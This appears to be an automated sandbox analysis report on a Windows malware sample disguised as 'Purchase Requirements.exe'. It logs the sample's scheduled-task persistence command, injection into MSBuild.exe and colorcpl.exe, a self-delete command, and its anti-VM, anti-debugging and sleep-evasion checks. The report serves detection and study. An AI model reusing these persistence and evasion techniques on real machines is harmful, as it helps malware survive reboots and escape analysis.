Source: C:\Users\user\Desktop\Purchase Requirements.exe Mutant created: \Sessions\1\BaseNamedObjects\dearrPEcQuQxOghVdtiylVmw
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5572:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
Source: C:\Users\user\Desktop\Purchase Requirements.exe File created: C:\Users\user\AppData\Local\Temp\tmp47B.tmp Jump to behavior
Source: Purchase Requirements.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Purchase Requirements.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Purchase Requirements.exe Virustotal: Detection: 33%
Source: Purchase Requirements.exe ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\Purchase Requirements.exe File read: C:\Users\user\Desktop\Purchase Requirements.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Purchase Requirements.exe 'C:\Users\user\Desktop\Purchase Requirements.exe'
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UCnSWpQKXBXg' /XML 'C:\Users\user\AppData\Local\Temp\tmp47B.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UCnSWpQKXBXg' /XML 'C:\Users\user\AppData\Local\Temp\tmp47B.tmp' Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Purchase Requirements.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Purchase Requirements.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Purchase Requirements.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: colorcpl.pdbGCTL source: MSBuild.exe, 00000007.00000002.769799256.0000000001129000.00000004.00000020.sdmp
Source: Binary string: colorcpl.pdb source: MSBuild.exe, 00000007.00000002.769799256.0000000001129000.00000004.00000020.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.710084049.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000007.00000002.770164401.00000000013C0000.00000040.00000001.sdmp, colorcpl.exe, 0000000F.00000002.920589747.00000000043F0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: MSBuild.exe, colorcpl.exe
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.710084049.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Binary contains a suspicious time stamp
Source: Purchase Requirements.exe Static PE information: 0xF489FAD9 [Sun Jan 3 18:15:53 2100 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_004150FC push ss; iretd 7_2_00415117
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0041B3B5 push eax; ret 7_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0041B46C push eax; ret 7_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0041B402 push eax; ret 7_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0041B40B push eax; ret 7_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0041C57F push dword ptr [7A69614Dh]; ret 7_2_0041C5A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0041B6CC push 24CBA43Eh; ret 7_2_0041B6FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0143D0D1 push ecx; ret 7_2_0143D0E4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0446D0D1 push ecx; ret 15_2_0446D0E4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0BA3A push es; iretd 15_2_02B0BA3B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0B3B5 push eax; ret 15_2_02B0B408
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B050FC push ss; iretd 15_2_02B05117
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0B9C3 push eax; retf 15_2_02B0B9C4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0BEFB pushad ; iretd 15_2_02B0BEFF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0B6CC push 24CBA43Eh; ret 15_2_02B0B6FD
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0B402 push eax; ret 15_2_02B0B408
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0B40B push eax; ret 15_2_02B0B472
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0B46C push eax; ret 15_2_02B0B472
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0C57F push dword ptr [7A69614Dh]; ret 15_2_02B0C5A0
Source: initial sample Static PE information: section name: .text entropy: 7.37998351086
Source: initial sample Static PE information: section name: .text entropy: 7.37998351086

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\Purchase Requirements.exe File created: C:\Users\user\AppData\Roaming\UCnSWpQKXBXg.exe Jump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UCnSWpQKXBXg' /XML 'C:\Users\user\AppData\Local\Temp\tmp47B.tmp'
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Purchase Requirements.exe PID: 6556, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 0000000002AF85E4 second address: 0000000002AF85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 0000000002AF897E second address: 0000000002AF8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_004088B0 rdtsc 7_2_004088B0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Purchase Requirements.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Purchase Requirements.exe TID: 6560 Thread sleep time: -43837s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe TID: 6584 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5788 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7120 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Purchase Requirements.exe Thread delayed: delay time: 43837 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000008.00000000.709716593.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000008.00000000.715203231.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: vmware
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000008.00000000.710623846.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.715203231.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.715378228.000000000A716000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATAa
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000008.00000000.743758950.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000008.00000000.709716593.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000008.00000000.715378228.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000008.00000000.709716593.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000008.00000000.716003271.000000000A863000.00000004.00000001.sdmp Binary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000008.00000000.715513412.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000008.00000000.709716593.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_004088B0 rdtsc 7_2_004088B0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_00409B20 LdrLoadDll, 7_2_00409B20
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140B944 mov eax, dword ptr fs:[00000030h] 7_2_0140B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140B944 mov eax, dword ptr fs:[00000030h] 7_2_0140B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E9100 mov eax, dword ptr fs:[00000030h] 7_2_013E9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E9100 mov eax, dword ptr fs:[00000030h] 7_2_013E9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E9100 mov eax, dword ptr fs:[00000030h] 7_2_013E9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EB171 mov eax, dword ptr fs:[00000030h] 7_2_013EB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EB171 mov eax, dword ptr fs:[00000030h] 7_2_013EB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EC962 mov eax, dword ptr fs:[00000030h] 7_2_013EC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01404120 mov eax, dword ptr fs:[00000030h] 7_2_01404120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01404120 mov eax, dword ptr fs:[00000030h] 7_2_01404120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01404120 mov eax, dword ptr fs:[00000030h] 7_2_01404120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01404120 mov eax, dword ptr fs:[00000030h] 7_2_01404120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01404120 mov ecx, dword ptr fs:[00000030h] 7_2_01404120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141513A mov eax, dword ptr fs:[00000030h] 7_2_0141513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141513A mov eax, dword ptr fs:[00000030h] 7_2_0141513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014741E8 mov eax, dword ptr fs:[00000030h] 7_2_014741E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140C182 mov eax, dword ptr fs:[00000030h] 7_2_0140C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141A185 mov eax, dword ptr fs:[00000030h] 7_2_0141A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01412990 mov eax, dword ptr fs:[00000030h] 7_2_01412990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EB1E1 mov eax, dword ptr fs:[00000030h] 7_2_013EB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EB1E1 mov eax, dword ptr fs:[00000030h] 7_2_013EB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EB1E1 mov eax, dword ptr fs:[00000030h] 7_2_013EB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014669A6 mov eax, dword ptr fs:[00000030h] 7_2_014669A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014161A0 mov eax, dword ptr fs:[00000030h] 7_2_014161A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014161A0 mov eax, dword ptr fs:[00000030h] 7_2_014161A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014651BE mov eax, dword ptr fs:[00000030h] 7_2_014651BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014651BE mov eax, dword ptr fs:[00000030h] 7_2_014651BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014651BE mov eax, dword ptr fs:[00000030h] 7_2_014651BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014651BE mov eax, dword ptr fs:[00000030h] 7_2_014651BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01400050 mov eax, dword ptr fs:[00000030h] 7_2_01400050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01400050 mov eax, dword ptr fs:[00000030h] 7_2_01400050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FB02A mov eax, dword ptr fs:[00000030h] 7_2_013FB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FB02A mov eax, dword ptr fs:[00000030h] 7_2_013FB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FB02A mov eax, dword ptr fs:[00000030h] 7_2_013FB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FB02A mov eax, dword ptr fs:[00000030h] 7_2_013FB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A2073 mov eax, dword ptr fs:[00000030h] 7_2_014A2073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B1074 mov eax, dword ptr fs:[00000030h] 7_2_014B1074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01467016 mov eax, dword ptr fs:[00000030h] 7_2_01467016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01467016 mov eax, dword ptr fs:[00000030h] 7_2_01467016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01467016 mov eax, dword ptr fs:[00000030h] 7_2_01467016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B4015 mov eax, dword ptr fs:[00000030h] 7_2_014B4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B4015 mov eax, dword ptr fs:[00000030h] 7_2_014B4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141002D mov eax, dword ptr fs:[00000030h] 7_2_0141002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141002D mov eax, dword ptr fs:[00000030h] 7_2_0141002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141002D mov eax, dword ptr fs:[00000030h] 7_2_0141002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141002D mov eax, dword ptr fs:[00000030h] 7_2_0141002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141002D mov eax, dword ptr fs:[00000030h] 7_2_0141002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0147B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0147B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0147B8D0 mov ecx, dword ptr fs:[00000030h] 7_2_0147B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0147B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0147B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0147B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0147B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0147B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0147B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0147B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0147B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E9080 mov eax, dword ptr fs:[00000030h] 7_2_013E9080
